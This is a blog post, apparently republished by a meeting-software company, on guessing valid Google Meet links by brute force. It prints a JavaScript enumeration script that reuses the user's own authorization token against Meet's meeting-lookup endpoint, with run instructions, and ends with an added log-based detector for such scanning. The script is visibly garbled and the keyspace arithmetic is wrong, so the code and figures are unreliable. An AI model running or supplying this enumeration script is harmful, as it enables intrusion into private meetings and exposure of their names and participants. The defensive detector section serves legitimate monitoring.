VISIO – Get stuck in Google Meet | Dyrk, Dyna Meet – Visio

Meet Visio


Dyrk

Currently working in the field of cybersecurity, I am regularly faced with fairly trivial situations.

The latest one: a person intruding on a meeting.
Fortunately, for safety, Google Meet includes a feature that both warns participants that someone is trying to join the videoconference and lets them accept or refuse the request.

However, this event led me to ask myself a number of questions.

Complexity of the Google Meet link

First of all, how is it possible for a person to connect to a Meet link without having been invited to it?

We must consider the simplicity of the link: https://google.meet.com/xxx-yyyy-zzzz

xxx-yyyy-zzzz contains only alphabetical characters between A and Z, i.e. 27 possible combinations for each character.

For mathematicians, there are therefore:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 possible combinations.

Lifespan of a Google Meet link

Although we now better understand how the links of our “Google Meet” conferences are built, there is a very important aspect to take into account: the lifespan of a Google Meet link!

Indeed, anyone can generate Google Meet meetings in a few clicks.
But after a few days, weeks or months, the links are no longer valid.

The generated links therefore have a certain period of validity.

The exception is “recurring” events, and this is where it becomes interesting.
In business, there are many occasions to hold meetings regularly (team / business, daily, weekly, monthly, ...).
When an employee creates this type of event in their calendar, a Google Meet link is generated automatically. This link does not change.
So you will have the same link each time for this event.

With a little JavaScript and brute force?

With all these elements, we are now equipped to sweep through all the possibilities and reach a high probability of detecting videoconference links!

So I reverse-engineered the operation of Google Meet a little in order to write JavaScript code that will try an infinite number of combinations.

(C) Dyrk.Org 2023-2024 – Meet’s Roulette
(1) run this script on https: // google.meet.com

(2) Find & Update Authorization’s variable with a valid authorization’s token in your googles’s “xhr Requests” Headers

Let Authorization = “Sapisidhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Split (”).MAP (Value => (< value, sort: Math.random() >)).spell ((a, b) => a.spell – b.spell).MAP ((< value >) => value).Join (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Split (”).MAP (C => C == ‘-‘?C: String.fromcharcode (math.Floor (Math.Random ()*25) +97)).Join (”),
Key = Newpatternkey (), Counter = 20;
Next = () => Key.Split (”).MAP (E => E == ‘-‘ ? E: Dico [Dico.Indexof (e) + 1> = Dico.length ? 0: Dico.Indexof (e) + 1]).Join (”),
Counter = 0;
meetlink = ‘https: // meet.Google.com/’, available toe = () => xHR = new xmlhttprequest ();
If (Counter ++> = 20) Counter = 0;
Key = Newpatternkey ();
Randomize ();
>
Key = Next ();
xhr.Open (‘Get’, Meetlink + Key);
xhr.Addeventlisner (‘load’, (e) => fetch (meetlink.concat (“/$ rpc/google.RTC.meetings.V1.MeetingSpaceService/ResolvemeetingSpace “),” Headers “:” Authorization “: Authorization,
“Content-Type”: “Application/X-Protobuf”,
“X-Goog-Adep-Key”: E.target.responsibility.Match (/\ [“https \: \/\/Meet \.Google\.com \ “\,” ([A-Za-Z0-9 \ _ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-Goog-enCode-Réspose-IF-EXECUTABLE”: “BASE64”,
“X-Goog-Meeting-identifier”: Btoa (‘\ B \ X02 \ X12 \ F’.Concat (Key)),
>,
“body”: “\ n \ f”.Concat (Key, “0 \ U0001”),
“Method”: “Post”
>).then (e => e.Text ())
.then (e =>

SetTimeout (available, 100);
console.Log (Meetlink.Concat (Key).Beautifydisplay (38), (e.Replace (/[^A-Za-Z0-9]/G, “”)+””).Beautifydisplay (38));
>);
>);
xhr.Send ();
>;
String.prototype.Beautifydisplay = Function (size) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >size ? TXT.Length: size)).Substr (0, size).Concat (‘|’); >,
console.Clear ();
available ();
>) ()

To run all of this, you will need to:

  1. Open the page https://meet.google.com
  2. Open the developer console
  3. In the “Network” tab, filter on Fetch / XHR and retrieve an “Authorization” token
  4. Copy and paste the source code above and put the token in the place indicated.
  5. Validate with the “Enter” key on your keyboard.

Recovery of “Authorization” token:

For the curious, this is what the result of this script in action should look like.
We can see lines telling us that the videoconference space does not exist,
and others that return the token of the conference, indicating that the link is valid ;)

However, do not expect to land on a Meet link within a few seconds ^^
(unless you are a little lucky).
You will need great patience, letting it run for at least half an hour.

Conclusion

Do not panic: there is a greater chance of finding a valid Google Meet link than of winning the Loto.

Attention! A person who comes across a valid Meet link gets access to certain information without needing to be logged in:
the name of the meeting (so avoid putting confidential information in it), and the connected participants (all or some of them).
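
Seen from the defender's side, the traffic described above (one lookup roughly every 100 ms, nearly all for meeting codes that do not exist) stands out in access logs. The following is an added example, not part of the original article and not Google's code; the log format, client identifiers and thresholds are assumptions chosen for illustration.

```javascript
// Added example (not the article's code): flag clients whose Meet-code lookups
// look like enumeration. Log format is a constructed assumption:
//   "<epoch_ms> <client_id> <meeting_code> <found|not_found>"
const CODE_RE = /^[a-z]{3}-[a-z]{4}-[a-z]{3}$/; // same shape as "xxx-xxxx-xxx"

function parseLine(line) {
  const [ts, client, code, outcome] = line.trim().split(/\s+/);
  if (!/^\d+$/.test(ts) || !CODE_RE.test(code)) return null; // skip malformed lines
  return { ts: Number(ts), client, code, found: outcome === 'found' };
}

// Per-client sliding window: many distinct codes with a high miss ratio is the
// signature of guessing; a real user revisits a handful of codes that exist.
function detectEnumeration(lines, opts = {}) {
  const { windowMs = 60000, minDistinct = 30, minMissRatio = 0.9 } = opts;
  const events = lines.map(parseLine).filter(Boolean).sort((a, b) => a.ts - b.ts);
  const windows = new Map(); // client -> events still inside the window
  const flagged = new Map(); // client -> first alert raised for that client
  for (const ev of events) {
    const q = windows.get(ev.client) || [];
    q.push(ev);
    while (q[0].ts < ev.ts - windowMs) q.shift(); // q always holds ev, never empties
    windows.set(ev.client, q);
    if (flagged.has(ev.client)) continue;
    const distinct = new Set(q.map(e => e.code)).size;
    const missRatio = q.filter(e => !e.found).length / q.length;
    if (distinct >= minDistinct && missRatio >= minMissRatio) {
      flagged.set(ev.client, { client: ev.client, firstFlaggedAt: ev.ts, distinct, missRatio });
    }
  }
  return [...flagged.values()];
}

// Constructed sample log: one guessing client, one ordinary user, one junk line.
function sampleLog() {
  const letters = 'abcdefghijklmnopqrstuvwxyz';
  const code = n => {
    let s = '';
    for (let i = 0; i < 10; i++) { s += letters[n % 26]; n = Math.floor(n / 26); }
    return `${s.slice(0, 3)}-${s.slice(3, 7)}-${s.slice(7)}`;
  };
  const lines = ['not a log line'];
  for (let i = 0; i < 40; i++) lines.push(`${1000 + i * 100} c-scan ${code(i)} not_found`);
  lines.push('5000 c-user abc-defg-hij found', '6000 c-user abc-defg-hij found',
             '7000 c-user abc-defh-hij not_found');
  return lines;
}

console.log(detectEnumeration(sampleLog()));
```

The ordinary user in the sample is never flagged, because a few visits to one recurring meeting and a single mistyped code stay far below both thresholds.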

Copyright © 2023 – Dyna’Meet
